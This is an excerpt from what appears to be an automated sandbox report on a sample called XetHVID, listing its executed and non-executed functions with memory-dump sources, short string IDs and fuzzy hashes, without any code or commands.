                                                                  • Opcode Fuzzy Hash: d742a260cd230f4bb51a277b9e07a4a4cbae0b154fad74441064de99716e1432
                                                                  • Instruction Fuzzy Hash: 4FB012E033020047C348AB94889D33629D2FF82304FD04CAA80C449000CF65000ACB47
                                                                  Function 073C6690 Relevance: .0, Instructions: 7COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9bc67b5d44a0604ede5bb5a073a74bf6fadf4b630ff7deb0679bc9bdefd30e7f
                                                                  • Instruction ID: 5676da3887795e28d2234e09940d2bb037ce940c29bd44057c9513826b89e0c7
                                                                  • Opcode Fuzzy Hash: 9bc67b5d44a0604ede5bb5a073a74bf6fadf4b630ff7deb0679bc9bdefd30e7f
                                                                  • Instruction Fuzzy Hash: 63A011E003820CCAA200A280B00B03AFB3C2082308F000008EA0E088022A2A3C300288

                                                                  Non-executed Functions

                                                                  Function 08CF6D08 Relevance: 8.0, Strings: 6, Instructions: 491COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'dq$4'dq$4'dq$4|iq$4|iq$$dq
                                                                  • API String ID: 0-2773531318
                                                                  • Opcode ID: ebfbdf0eb9dfa8e185eed2ab5e2a238b7794c6368e01024441cea4f9e7c0d37a
                                                                  • Instruction ID: 9763bf829868134c7347577c7cfc1ac86efe6967a4ef0344d03ef1d6c3ccf021
                                                                  • Opcode Fuzzy Hash: ebfbdf0eb9dfa8e185eed2ab5e2a238b7794c6368e01024441cea4f9e7c0d37a
                                                                  • Instruction Fuzzy Hash: CAF1B071700251CFEB599F69C494A2E7BB2BF8570271A44BEE606CB362CB31DD4287A1

                                                                  Executed Functions

                                                                  Function 02A01360 Relevance: 4.2, Strings: 3, Instructions: 455COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.1751845241.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_2a00000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq$$dq$$dq
                                                                  • API String ID: 0-2861643491
                                                                  • Opcode ID: 296882c9c4be6424a69eb3027cafbb3e17b0176f3a3a76a0b64fd470e80336ce
                                                                  • Instruction ID: ac991d7a6227a345bc3d31dd53d4da326f3d4bd23fe6a698028313cf10c9eef3
                                                                  • Opcode Fuzzy Hash: 296882c9c4be6424a69eb3027cafbb3e17b0176f3a3a76a0b64fd470e80336ce
                                                                  • Instruction Fuzzy Hash: 16F172747002149FDB19AB75ED58B6E7BE2FF88301F104529E50AAB3E5DF719C068B80
                                                                  Function 02A01165 Relevance: 3.1, Strings: 2, Instructions: 590COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.1751845241.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_2a00000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq$$dq
                                                                  • API String ID: 0-2340669324
                                                                  • Opcode ID: 3c6c9ae87d3b2b4aefa1d234d3fba6f7faf1203c4098542049bc9029497962d9
                                                                  • Instruction ID: 4fe533ac3172754a1b24cfff4a16b1e966ddef89947e9c23b2fbfe694a2a0a2f
                                                                  • Opcode Fuzzy Hash: 3c6c9ae87d3b2b4aefa1d234d3fba6f7faf1203c4098542049bc9029497962d9
                                                                  • Instruction Fuzzy Hash: F2D14E747042148FCB19AB75EC94BAE7BE2EF88301F144569E40AAB3E5DF359C06CB91
                                                                  Function 02A014ED Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.1751845241.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_2a00000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq$$dq
                                                                  • API String ID: 0-2340669324
                                                                  • Opcode ID: 1b2801241abc66ef2fdff9d707a043f1abab0e4efbface47cfd7993f5bb5cbef
                                                                  • Instruction ID: adcf8e4cadd4ca296d1689f161be0646006f5005e5402e1d24b15a3f9a02d0b5
                                                                  • Opcode Fuzzy Hash: 1b2801241abc66ef2fdff9d707a043f1abab0e4efbface47cfd7993f5bb5cbef
                                                                  • Instruction Fuzzy Hash: 7C9192707002148FDB19AB79D9947AF7AE3BF88700F14852DE50AAB3E4DF719D068B91
                                                                  Function 02A00E60 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.1751845241.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_2a00000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LRdq
                                                                  • API String ID: 0-3106745678
                                                                  • Opcode ID: 09418f679f2d782516bfd6002934d25c168f84b4ac1ea8b5924cf07db1a8f553
                                                                  • Instruction ID: 269309c80a25678f0762a1cfb46e96b476f75146e5fae2c5db6453bf3b112f68
                                                                  • Opcode Fuzzy Hash: 09418f679f2d782516bfd6002934d25c168f84b4ac1ea8b5924cf07db1a8f553
                                                                  • Instruction Fuzzy Hash: 2121F630B112159FCB49EB78889577F7BF6AFC9304B1484AAE449EB395DE30DD028792
                                                                  Function 02A00E50 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.1751845241.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_2a00000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LRdq
                                                                  • API String ID: 0-3106745678
                                                                  • Opcode ID: 9cf59cf4a825a7bb69d67d6f97c40da2fa19c144b0226a0dd96e9ea3246ee5e8
                                                                  • Instruction ID: 87960a99ee36b871fff97110ce42ca6692509d7bceba7568a49911810019a9e9
                                                                  • Opcode Fuzzy Hash: 9cf59cf4a825a7bb69d67d6f97c40da2fa19c144b0226a0dd96e9ea3246ee5e8
                                                                  • Instruction Fuzzy Hash: A721F330B002155FCB45EB78989077F7BF6AFC4304B1484AEE449EB39ADE709D028B92
                                                                  Function 02A00959 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.1751845241.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_2a00000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Hhq
                                                                  • API String ID: 0-4210879014
                                                                  • Opcode ID: ed88938f96a450906b63410c97482b813db1715bd1c6ed6dffac22b194828543
                                                                  • Instruction ID: 2ce59979218fb23460f2a00fff64a93b4e27bdb55ea07bef28eb6e8c74af9974
                                                                  • Opcode Fuzzy Hash: ed88938f96a450906b63410c97482b813db1715bd1c6ed6dffac22b194828543
                                                                  • Instruction Fuzzy Hash: 4821C230E041048FCB44EFB894A67AE7FB1AF85300F1485BDD009E7681DB755A02CB81
                                                                  Function 02A00D40 Relevance: .1, Instructions: 123COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.1751845241.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_2a00000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1f74ba1a2f3533410af298751cd45e2c498d3c2a83613d9a32bfae5dd1a22352
                                                                  • Instruction ID: 8a07049870ab2d26181a678eebda2c67a3797cdc9b36405667d4227476e3a7c2
                                                                  • Opcode Fuzzy Hash: 1f74ba1a2f3533410af298751cd45e2c498d3c2a83613d9a32bfae5dd1a22352
                                                                  • Instruction Fuzzy Hash: 0C41D1B0B003149FCB04ABB9D85576EBBEBEFC9301F104429E10AA7395DF3899468B91
                                                                  Function 02A00C22 Relevance: .1, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.1751845241.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_2a00000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1a7319b174746cc59fd50255777973f0e117722a8c8b0953cd46034e3a9e164c
                                                                  • Instruction ID: e6070620ca96c860ec1b00c57ebc90c6a94ed136f8f6c908820cf10eaec11dab
                                                                  • Opcode Fuzzy Hash: 1a7319b174746cc59fd50255777973f0e117722a8c8b0953cd46034e3a9e164c
                                                                  • Instruction Fuzzy Hash: 18313E74904219DFCB41EB78D8517AEBBB2FF84301F104A69E005A7394DB745A86CB51
                                                                  Function 02A00C30 Relevance: .1, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.1751845241.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_2a00000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ee2e8f5675cfa4ae29246dc7124b78871c4a61a7c175363fe40c719ceab6f624
                                                                  • Instruction ID: fde5f399b03c3b49631da22d5bbd50eae7b89b99086bc2d5a61b4db6d617b0b0
                                                                  • Opcode Fuzzy Hash: ee2e8f5675cfa4ae29246dc7124b78871c4a61a7c175363fe40c719ceab6f624
                                                                  • Instruction Fuzzy Hash: 54215EB4900219DFCB41EFB8D85079EBBB6FF88301F104969E105A7394DB346A85CB51
                                                                  Function 02A00838 Relevance: .1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.1751845241.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_2a00000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 47d918cac0443c78cbcbddaa7d81c9a28539bd501a576ccb23f04fc5b6066f35
                                                                  • Instruction ID: 9738535b45d6db2ea5ab498f5d9a4cc9a9fa59236f9ba9d71129dc23634204bd
                                                                  • Opcode Fuzzy Hash: 47d918cac0443c78cbcbddaa7d81c9a28539bd501a576ccb23f04fc5b6066f35
                                                                  • Instruction Fuzzy Hash: 05217A742042669FCF42FF28FD84B997BB5FB54306B109E64F0088B26DD670698B8F81
                                                                  Function 02A00848 Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000D.00000002.1751845241.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_13_2_2a00000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 88f13ab377f8ee34293a7d16e54df222ab64cc517c4697286699c48cefa7748e
                                                                  • Instruction ID: 8bb969ded37a834654d7e5a51a33974c363e82547a51e028ff8dc04acefd237e
                                                                  • Opcode Fuzzy Hash: 88f13ab377f8ee34293a7d16e54df222ab64cc517c4697286699c48cefa7748e
                                                                  • Instruction Fuzzy Hash: 2E21587420422A9FCF42FF28FD85B557BE5FB54307B109E64B0088B26DD670A98B8F81